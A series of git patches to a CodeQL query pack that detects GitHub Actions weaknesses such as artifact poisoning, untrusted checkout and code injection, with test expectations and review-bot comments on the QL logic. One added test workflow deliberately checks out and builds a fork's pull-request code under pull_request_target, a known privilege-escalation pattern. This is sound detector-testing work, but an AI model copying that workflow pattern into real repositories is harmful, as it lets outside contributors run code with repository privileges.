| ./bar/cmd\n | Potential privileged artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning33.yml:17:14:18:20 | ./bar/cmd\n | ./bar/cmd\n | -| .github/workflows/artifactpoisoning34.yml:20:14:22:23 | npm install\nnpm run lint\n | .github/workflows/artifactpoisoning34.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning34.yml:20:14:22:23 | npm install\nnpm run lint\n | Potential privileged artifact poisoning in $@, which may be controlled by an external user. 
| .github/workflows/artifactpoisoning34.yml:20:14:22:23 | npm install\nnpm run lint\n | npm install\nnpm run lint\n | -| .github/workflows/artifactpoisoning41.yml:22:14:22:22 | ./foo/cmd | .github/workflows/artifactpoisoning41.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning41.yml:22:14:22:22 | ./foo/cmd | Potential privileged artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning41.yml:22:14:22:22 | ./foo/cmd | ./foo/cmd | -| .github/workflows/artifactpoisoning42.yml:22:14:22:18 | ./cmd | .github/workflows/artifactpoisoning42.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning42.yml:22:14:22:18 | ./cmd | Potential privileged artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning42.yml:22:14:22:18 | ./cmd | ./cmd | -| .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | Potential privileged artifact poisoning in $@, which may be controlled by an external user. 
| .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | -| .github/workflows/artifactpoisoning52.yml:19:14:23:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:19:14:23:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | Potential privileged artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning52.yml:19:14:23:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | -| .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | Potential privileged artifact poisoning in $@, which may be controlled by an external user. 
| .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | +| .github/workflows/artifactpoisoning12.yml:38:11:38:61 | ./x.py build -j$(nproc) --compiler gcc --skip-build | .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning12.yml:38:11:38:61 | ./x.py build -j$(nproc) --compiler gcc --skip-build | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning12.yml:38:11:38:61 | ./x.py build -j$(nproc) --compiler gcc --skip-build | ./x.py build -j$(nproc) --compiler gcc --skip-build | +| .github/workflows/artifactpoisoning21.yml:19:14:20:21 | sh foo/cmd\n | .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | .github/workflows/artifactpoisoning21.yml:19:14:20:21 | sh foo/cmd\n | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning21.yml:19:14:20:21 | sh foo/cmd\n | sh foo/cmd\n | +| .github/workflows/artifactpoisoning22.yml:18:14:18:19 | sh cmd | .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | .github/workflows/artifactpoisoning22.yml:18:14:18:19 | sh cmd | Potential artifact poisoning in $@, which may be controlled by an external user. 
| .github/workflows/artifactpoisoning22.yml:18:14:18:19 | sh cmd | sh cmd | +| .github/workflows/artifactpoisoning31.yml:19:14:19:22 | ./foo/cmd | .github/workflows/artifactpoisoning31.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning31.yml:19:14:19:22 | ./foo/cmd | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning31.yml:19:14:19:22 | ./foo/cmd | ./foo/cmd | +| .github/workflows/artifactpoisoning32.yml:17:14:18:20 | ./bar/cmd\n | .github/workflows/artifactpoisoning32.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning32.yml:17:14:18:20 | ./bar/cmd\n | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning32.yml:17:14:18:20 | ./bar/cmd\n | ./bar/cmd\n | +| .github/workflows/artifactpoisoning33.yml:17:14:18:20 | ./bar/cmd\n | .github/workflows/artifactpoisoning33.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning33.yml:17:14:18:20 | ./bar/cmd\n | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning33.yml:17:14:18:20 | ./bar/cmd\n | ./bar/cmd\n | +| .github/workflows/artifactpoisoning34.yml:20:14:22:23 | npm install\nnpm run lint\n | .github/workflows/artifactpoisoning34.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning34.yml:20:14:22:23 | npm install\nnpm run lint\n | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning34.yml:20:14:22:23 | npm install\nnpm run lint\n | npm install\nnpm run lint\n | +| .github/workflows/artifactpoisoning41.yml:22:14:22:22 | ./foo/cmd | .github/workflows/artifactpoisoning41.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning41.yml:22:14:22:22 | ./foo/cmd | Potential artifact poisoning in $@, which may be controlled by an external user. 
| .github/workflows/artifactpoisoning41.yml:22:14:22:22 | ./foo/cmd | ./foo/cmd | +| .github/workflows/artifactpoisoning42.yml:22:14:22:18 | ./cmd | .github/workflows/artifactpoisoning42.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning42.yml:22:14:22:18 | ./cmd | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning42.yml:22:14:22:18 | ./cmd | ./cmd | +| .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | +| .github/workflows/artifactpoisoning52.yml:19:14:23:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:19:14:23:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | Potential artifact poisoning in $@, which may be controlled by an external user. 
| .github/workflows/artifactpoisoning52.yml:19:14:23:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | +| .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | diff --git a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.qlref b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.qlref new file mode 100644 index 00000000000..4f8d2af04e8 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.qlref @@ -0,0 +1,2 @@ +Security/CWE-829/ArtifactPoisoningCritical.ql + diff --git a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoning.expected b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected similarity index 100% rename from ql/test/query-tests/Security/CWE-829/ArtifactPoisoning.expected rename to ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected diff --git a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.qlref b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.qlref new file mode 100644 index 00000000000..39548f27412 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.qlref @@ -0,0 +1,2 @@ +Security/CWE-829/ArtifactPoisoningMedium.ql + 
diff --git a/ql/test/query-tests/Security/CWE-829/PrivilegedArtifactPoisoning.qlref b/ql/test/query-tests/Security/CWE-829/PrivilegedArtifactPoisoning.qlref
deleted file mode 100644
index 3c8de29c450..00000000000
--- a/ql/test/query-tests/Security/CWE-829/PrivilegedArtifactPoisoning.qlref
+++ /dev/null
@@ -1,2 +0,0 @@
-Security/CWE-829/PrivilegedArtifactPoisoning.ql
-
diff --git a/ql/test/query-tests/Security/CWE-829/PrivilegedUntrustedCheckoutCritical.qlref b/ql/test/query-tests/Security/CWE-829/PrivilegedUntrustedCheckoutCritical.qlref
deleted file mode 100644
index 8fe52c7d914..00000000000
--- a/ql/test/query-tests/Security/CWE-829/PrivilegedUntrustedCheckoutCritical.qlref
+++ /dev/null
@@ -1 +0,0 @@
-Security/CWE-829/PrivilegedUntrustedCheckoutCritical.ql
diff --git a/ql/test/query-tests/Security/CWE-829/PrivilegedUntrustedCheckoutHigh.qlref b/ql/test/query-tests/Security/CWE-829/PrivilegedUntrustedCheckoutHigh.qlref
deleted file mode 100644
index 32953132a45..00000000000
--- a/ql/test/query-tests/Security/CWE-829/PrivilegedUntrustedCheckoutHigh.qlref
+++ /dev/null
@@ -1 +0,0 @@
-Security/CWE-829/PrivilegedUntrustedCheckoutHigh.ql
diff --git a/ql/test/query-tests/Security/CWE-829/PrivilegedUntrustedCheckoutCritical.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected
similarity index 100%
rename from ql/test/query-tests/Security/CWE-829/PrivilegedUntrustedCheckoutCritical.expected
rename to ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected
diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.qlref b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.qlref
new file mode 100644
index 00000000000..9f17733e16e
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.qlref
@@ -0,0 +1 @@
+Security/CWE-829/UntrustedCheckoutCritical.ql
diff --git a/ql/test/query-tests/Security/CWE-829/PrivilegedUntrustedCheckoutHigh.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.expected similarity index 100% rename from ql/test/query-tests/Security/CWE-829/PrivilegedUntrustedCheckoutHigh.expected rename to ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.expected diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.qlref b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.qlref new file mode 100644 index 00000000000..66b3f2cd9bf --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.qlref @@ -0,0 +1 @@ +Security/CWE-829/UntrustedCheckoutHigh.ql diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected new file mode 100644 index 00000000000..e69de29bb2d diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.qlref b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.qlref new file mode 100644 index 00000000000..55bb194f5ec --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.qlref @@ -0,0 +1 @@ +Security/CWE-829/UntrustedCheckoutMedium.ql From e86fa9744aef3783108d225812be2e528ef116c1 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 21 May 2024 23:05:30 +0200 Subject: [PATCH 0303/1267] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index b1a100a7040..b3f4a7b112e 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: githubsecuritylab/actions-all -version: 0.0.26 +version: 0.0.27 dependencies: codeql/util: ^0.2.0 codeql/yaml: ^0.1.2 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 341b6f45c29..c0aa886d042 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml 
@@ -1,7 +1,7 @@ --- library: false name: githubsecuritylab/actions-queries -version: 0.0.26 +version: 0.0.27 groups: - actions - queries From 4d28d6aa7c74ac627926882a9997c4cb95d65b6c Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 22 May 2024 11:07:52 +0200 Subject: [PATCH 0304/1267] Improve toctou queries --- ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql | 2 +- ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql | 2 +- .../query-tests/Security/CWE-094/CodeInjectionMedium.expected | 1 - 3 files changed, 2 insertions(+), 3 deletions(-) diff --git a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql index 2144db7afa0..ff9148ab583 100644 --- a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql +++ b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql @@ -18,7 +18,7 @@ import codeql.actions.security.PoisonableSteps from ControlCheck check, MutableRefCheckoutStep checkout where // the job can be triggered by an external user - check.getEnclosingJob().isExternallyTriggerable() and + inPrivilegedExternallyTriggerableJob(check) and // the mutable checkout step is protected by an access check check = [checkout.getIf(), checkout.getEnclosingJob().getIf()] and // the checked-out code may lead to arbitrary code execution diff --git a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql index 11dfa7fc567..c1118bc00ca 100644 --- a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql +++ b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql 
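Review bot: The context comment `// the job can be triggered by an external user` directly above the changed line in UntrustedCheckoutTOCTOUCritical.ql no longer describes the condition. The new call is `inPrivilegedExternallyTriggerableJob(check)`, which by its name also requires the job to be privileged (its definition is not part of this hunk, so that is inferred). I would change the comment to `// the check runs in a privileged job that can be triggered by an external user`, and do the same in UntrustedCheckoutTOCTOUHigh.ql, which receives the identical edit in the next hunk. The `where` clause continues past the end of both hunks.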
@@ -18,7 +18,7 @@ import codeql.actions.security.PoisonableSteps from ControlCheck check, MutableRefCheckoutStep checkout where // the job can be triggered by an external user - check.getEnclosingJob().isExternallyTriggerable() and + inPrivilegedExternallyTriggerableJob(check) and // the mutable checkout step is protected by an access check check = [checkout.getIf(), checkout.getEnclosingJob().getIf()] and // there are no evidences that the checked-out code can lead to arbitrary code execution diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected index 298c4ce75a4..4fb130aa07a 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected @@ -233,7 +233,6 @@ nodes | .github/workflows/test3.yml:60:27:60:66 | needs.parse-issue.outputs.payload | semmle.label | needs.parse-issue.outputs.payload | | .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | semmle.label | toJSON(github.event.comment) | | .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | semmle.label | toJSON(github.event.issue) | -| .github/workflows/test4.yml:23:21:23:41 | toJSON(github) | semmle.label | toJSON(github) | | .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | semmle.label | toJSON(github.event) | | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | semmle.label | steps.step5.outputs.MSG5 | From 367531a6597fcfd5a09735bd7c9e9a372ea6a446 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 22 May 2024 11:08:22 +0200 Subject: [PATCH 0305/1267] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) 
diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index b3f4a7b112e..649064e1ddd 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: githubsecuritylab/actions-all -version: 0.0.27 +version: 0.0.28 dependencies: codeql/util: ^0.2.0 codeql/yaml: ^0.1.2 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index c0aa886d042..d0d7e48a1b2 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: githubsecuritylab/actions-queries -version: 0.0.27 +version: 0.0.28 groups: - actions - queries From 33ae3b1625dc60d5b9a8c32b1e70fe0920395c17 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 22 May 2024 18:53:39 +0200 Subject: [PATCH 0306/1267] minor updates --- .../actions/security/PoisonableSteps.qll | 2 +- .../security/UntrustedCheckoutQuery.qll | 4 +-- .../CWE-349/.github/workflows/test17.yml | 27 +++++++++++++++++++ 3 files changed, 30 insertions(+), 3 deletions(-) create mode 100644 ql/test/query-tests/Security/CWE-349/.github/workflows/test17.yml diff --git a/ql/lib/codeql/actions/security/PoisonableSteps.qll b/ql/lib/codeql/actions/security/PoisonableSteps.qll index 40dfbd3a0b0..646dc35d1f4 100644 --- a/ql/lib/codeql/actions/security/PoisonableSteps.qll +++ b/ql/lib/codeql/actions/security/PoisonableSteps.qll @@ -5,7 +5,7 @@ abstract class PoisonableStep extends Step { } // source: https://github.com/boostsecurityio/poutine/blob/main/opa/rego/rules/untrusted_checkout_exec.rego#L16 private string dangerousActions() { result = - ["pre-commit/action", "oxsecurity/megalinter", "bridgecrewio/checkov-action", "ruby/setup-ruby"] + ["pre-commit/action", "oxsecurity/megalinter", "bridgecrewio/checkov-action", "ruby/setup-ruby", "actions/jekyll-build-pages"] } class DangerousActionUsesStep extends PoisonableStep, UsesStep { 
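Review bot: The `// source:` comment above `dangerousActions()` in PoisonableSteps.qll still attributes the whole list to the poutine rule file, so a reader cannot tell whether `actions/jekyll-build-pages` comes from that list or is a local addition. If it is local, a one-line reason next to the entry would help the next maintainer, e.g. `// actions/jekyll-build-pages: builds the site from the checked-out workspace (see CWE-349 test17.yml)`. The array literal also now sits on a single long line; one entry per line would keep later additions to one-line diffs.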
diff --git a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll index aeceaa8da75..3bc1f3649a3 100644 --- a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll +++ b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll @@ -108,8 +108,8 @@ class ActionsMutableRefCheckout extends MutableRefCheckoutStep instanceof UsesSt exists(StepsExpression e | this.getArgumentExpr("ref") = e and ( - e.getStepId().matches(["%ref%", "%branch%"]) or - e.getFieldName().matches(["%ref%", "%branch%"]) + e.getStepId().matches(["%head%", "%pull_request%", "%_pr_%"]) or + e.getFieldName().matches(["%head%", "%pull_request%", "%_pr_%"]) ) ) ) diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test17.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/test17.yml new file mode 100644 index 00000000000..60ba26406c6 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-349/.github/workflows/test17.yml @@ -0,0 +1,27 @@ +name: Test + +on: + # Runs on pull requests targeting the default branch + pull_request_target: + branches: ["main"] + +jobs: + build: + # Limit permissions of the GITHUB_TOKEN for untrusted code + permissions: + contents: read + runs-on: ubuntu-latest + steps: + - name: Checkout + uses: actions/checkout@v4 + with: + ref: ${{ github.event.pull_request.head.ref }} + repository: ${{ github.event.pull_request.head.repo.full_name }} + - name: Setup Pages + uses: actions/configure-pages@v5 + - name: Build with Jekyll + uses: actions/jekyll-build-pages@v1 + with: + source: ./ + destination: ./_site + From 16a752280785289f02297e6995bba7a4a97e5ea5 Mon Sep 17 00:00:00 2001 
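Review bot: In the new patterns of `ActionsMutableRefCheckout` the `_` is not a literal underscore. QL's `matches` treats `_` as a single-character wildcard and `%` as any sequence, so `"%_pr_%"` accepts any step id or field name with `pr` anywhere except at the very start or end (`compress-out` would match), and `"%pull_request%"` also accepts `pull-request`. To match the literal character the underscore has to be escaped, e.g. `"%\\_pr\\_%"`. The enclosing `exists` block starts outside this hunk.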
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 22 May 2024 23:24:17 +0200 Subject: [PATCH 0307/1267] Improve Untrusted checkout queries --- ql/lib/codeql/actions/ast/internal/Ast.qll | 31 ++++++++++++----- .../security/UntrustedCheckoutQuery.qll | 8 ++--- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- .../CWE-094/CodeInjectionCritical.expected | 2 ++ .../CWE-094/CodeInjectionMedium.expected | 2 -- .../Security/CWE-349/CachePoisoning.expected | 1 + .../CWE-829/.github/workflows/mend.yml | 33 +++++++++++++++++++ .../workflows/priv_pull_request_checkout.yml | 23 +++++++++++++ .../CWE-829/UnpinnedActionsTag.expected | 1 + .../UntrustedCheckoutCritical.expected | 2 ++ 11 files changed, 90 insertions(+), 17 deletions(-) create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/mend.yml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/priv_pull_request_checkout.yml diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index ebe2c70533d..61f0fa8e36e 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll 
@@ -748,7 +748,13 @@ class JobImpl extends AstNodeImpl, TJobNode { /** Holds if the job can be triggered by an external actor. */ predicate isExternallyTriggerable() { - externallyTriggerableEventsDataModel(this.getATriggerEvent().getName()) + // the job is triggered by an event that can be triggered externally + externallyTriggerableEventsDataModel(this.getATriggerEvent().getName()) or + // the job is triggered by a workflow_call event that can be triggered externally + this.getATriggerEvent().getName() = "workflow_call" and + (exists(ExpressionImpl e, string external_trigger | e.getEnclosingJob() = this and e.getExpression().matches("%github.event" + external_trigger + "%") and externallyTriggerableEventsDataModel(external_trigger)) + or + this.getEnclosingWorkflow().(ReusableWorkflowImpl).getACaller().isExternallyTriggerable()) } /** Holds if the job is privileged. */ @@ -775,7 +781,9 @@ class JobImpl extends AstNodeImpl, TJobNode { private predicate hasExplicitSecretAccess() { // the job accesses a secret other than GITHUB_TOKEN exists(SecretsExpressionImpl expr | - expr.getEnclosingJob() = this and not expr.getFieldName() = "GITHUB_TOKEN" + (expr.getEnclosingJob() = this or not exists(expr.getEnclosingJob())) and + expr.getEnclosingWorkflow() = this.getEnclosingWorkflow() and + not expr.getFieldName() = "GITHUB_TOKEN" ) } 
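Review bot: In the `workflow_call` branch added to `isExternallyTriggerable`, the pattern `"%github.event" + external_trigger + "%"` joins `github.event` and the event name with no separator. Unless the values held by `externallyTriggerableEventsDataModel` start with a dot (not visible here), an expression such as `github.event.pull_request.title` would not match; I would expect `"%github.event." + external_trigger + "%"`. Even with the dot, event names and payload keys are not the same set (an `issue_comment` event exposes `github.event.comment` and `github.event.issue`), so this heuristic probably recognises only some externally triggerable reusable workflows and the comment should say so.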
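Review bot: The comment `// the job accesses a secret other than GITHUB_TOKEN` in `hasExplicitSecretAccess` is now narrower than the condition, which also accepts any secrets expression in the same workflow that has no enclosing job. One workflow-level reference (presumably a top-level `env:` entry) therefore marks every job in that workflow as having explicit secret access. If that is intended, the comment should state it, e.g. `// the job, or the workflow outside any job, references a secret other than GITHUB_TOKEN`.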
@@ -803,16 +811,21 @@ class JobImpl extends AstNodeImpl, TJobNode { } private predicate hasPrivilegedTrigger() { - // For workflows that are triggered by the pull_request_target event, the GITHUB_TOKEN is granted read/write repository permission unless the permissions key is specified and the workflow can access secrets, even when it is triggered from a fork. - // The Job is triggered by an event other than `pull_request` + // the Job is triggered by an event other than `pull_request` count(this.getATriggerEvent()) = 1 and - not this.getATriggerEvent().getName() = ["pull_request", "workflow_call"] + not this.getATriggerEvent().getName() = "pull_request" and + not this.getATriggerEvent().getName() = "workflow_call" or - // The Workflow is a Reusable Workflow only and there is - // a privileged caller workflow - this.getEnclosingWorkflow().(ReusableWorkflowImpl).getACaller().isPrivileged() + // the Workflow is a Reusable Workflow only and there is + // a privileged caller workflow or we cant find a caller + count(this.getATriggerEvent()) = 1 and + this.getATriggerEvent().getName() = "workflow_call" and + ( + this.getEnclosingWorkflow().(ReusableWorkflowImpl).getACaller().isPrivileged() or + not exists(this.getEnclosingWorkflow().(ReusableWorkflowImpl).getACaller()) + ) or - // The Workflow has multiple triggers so at least one is not "pull_request" + // the Workflow has multiple triggers so at least one is not "pull_request" count(this.getATriggerEvent()) > 1 } diff --git a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll index 3bc1f3649a3..6c3b042d1e7 100644 --- a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll +++ b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll 
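Review bot: The comment on the first disjunct of `hasPrivilegedTrigger` still reads "an event other than `pull_request`" although the condition now excludes `workflow_call` as well, and the deleted comment about `pull_request_target` was the only rationale the predicate carried. The new fallback `not exists(this.getEnclosingWorkflow().(ReusableWorkflowImpl).getACaller())` treats a reusable workflow with no caller in the database as privileged. That is the conservative choice, but it raises severity for workflows that are only called from other repositories, which appears to be what moves the reusable-workflow-1/2 rows into CodeInjectionCritical.expected in this commit. I would record it next to the condition, e.g. `// no caller found in the database: assume a privileged caller (may over-report)`.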
